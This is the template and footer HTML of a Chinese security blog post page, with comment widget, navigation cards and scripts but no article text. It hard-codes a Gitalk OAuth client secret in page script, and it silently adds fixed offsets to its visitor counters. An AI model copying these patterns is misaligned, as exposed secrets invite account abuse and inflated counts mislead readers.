    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>


        </div>
    </div>

    
    <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '0ec96340c73d93f2ef96',
        clientSecret: '5fc147935bb296ad377b62699db728084af6d56e',
        repo: 'newlzs.github.io',
        owner: 'newlzs',
        admin: "newlzs",
        id: '2019/09/25/2019-gong-fang-shi-jie-web-jin-jie/',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>
    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2019/10/03/2019-mysql-chang-yong-ming-ling/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="mysql常用命令">
                        
                        <span class="card-title">mysql常用命令</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            为了更好的了解sql注入，有大致看了一遍mysql的命令语句，总结一下方便查看。
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-10-03
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/网络安全/" class="post-category" target="_blank">
                                    网络安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/" target="_blank">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/数据库/" target="_blank">
                        <span class="chip bg-color">数据库</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/09/25/2019-feng-huang-wan-ge-hei-ke-du-bai/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/19.jpg" class="responsive-img" alt="凤凰挽歌，黑客独白">
                        
                        <span class="card-title">凤凰挽歌，黑客独白</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            看看来时的路
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-09-25
                            </span>
                        <span class="publish-author">
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/心情/" target="_blank">
                        <span class="chip bg-color">心情</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: ZS BLOG<br />'
            + '作者: 子实<br />'
            + '链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () { bodyElement.removeChild(newdiv); }, 200);
    });
</script>

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <!-- 血小板 -->
    <div id="landlord">
        <div class="message" style="opacity:0"></div>
        <canvas id="live2d" width="560" height="500" class="live2d"></canvas>
        <div class="hide-button">隐藏</div>
    </div>
    <!-- live2d 血小板 -->
    <script type="text/javascript" src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript">
        var message_Path = '/live2d/'
        var home_Path = 'https://haremu.com/'
    </script>
    <script type="text/javascript" src="/live2d/js/live2d.js"></script>
    <script type="text/javascript" src="/live2d/js/message.js"></script>
    <script type="text/javascript">
        loadlive2d("live2d", "/live2d/model/xiaoban/model.json");
    </script>
    
    
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            &copy; 2019 ZiShi. All Rights Reserved.

            
            &nbsp;<i class="fa fa-area-chart"></i>&nbsp;站点总字数:&nbsp;
            <span class="white-color">53k</span>
            

            <br>
            <span id="sitetime"></span>

            
            
            <br>
            
            <span id="busuanzi_container_site_pv" style='display:none'>
                <i class="fa fa-heart-o"></i>
                本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
            <span id="busuanzi_container_site_uv" style='display:none'>
                人次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
            </span>
            
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/newlzs" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="mailto:lzs.online@foxmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="https://zhihu.com/people/li-da-da-da-73" class="tooltipped" target="_blank" data-tooltip="访问我的知乎" data-position="top" data-delay="50">
        <i class="fa fa-inverse">知</i>
    </a>



    <a href="https://user.qzone.qq.com/1581004928" class="tooltipped" target="_blank" data-tooltip="访问我的QQ空间" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>





    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fa fa-rss"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>

<!-- 不蒜子计数初始值纠正 -->
<script>
    $(document).ready(function () {

        var int = setInterval(fixCount, 50);
        var pvcountOffset = 80000;
        var uvcountOffset = 20000;

        function fixCount() {
            if (document.getElementById("busuanzi_container_site_pv").style.display != "none") {
                $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + pvcountOffset);
                clearInterval(int);
            }
            if ($("#busuanzi_container_site_pv").css("display") != "none") {
                $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + uvcountOffset); // 加上初始数据 
                clearInterval(int);
            }
        }
    });
</script>

<script language=javascript>
    function siteTime() {
        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
        year - 作为date对象的年份，为4位年份值
        month - 0-11之间的整数，做为date对象的月份
        day - 1-31之间的整数，做为date对象的天数
        hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
        minutes - 0-59之间的整数，做为date对象的分钟数
        seconds - 0-59之间的整数，做为date对象的秒数
        microseconds - 0-999之间的整数，做为date对象的毫秒数 */
        var t1 = Date.UTC(2018, 12, 11, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "本站已运行 " + diffYears + " 年 " + diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }/*因为建站时间还没有一年，就将之注释掉了。需要的可以取消*/
    siteTime();
</script>

<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id="></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', '');
</script>



    <script src="/libs/others/clicklove.js"></script>


    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


</body>
</html>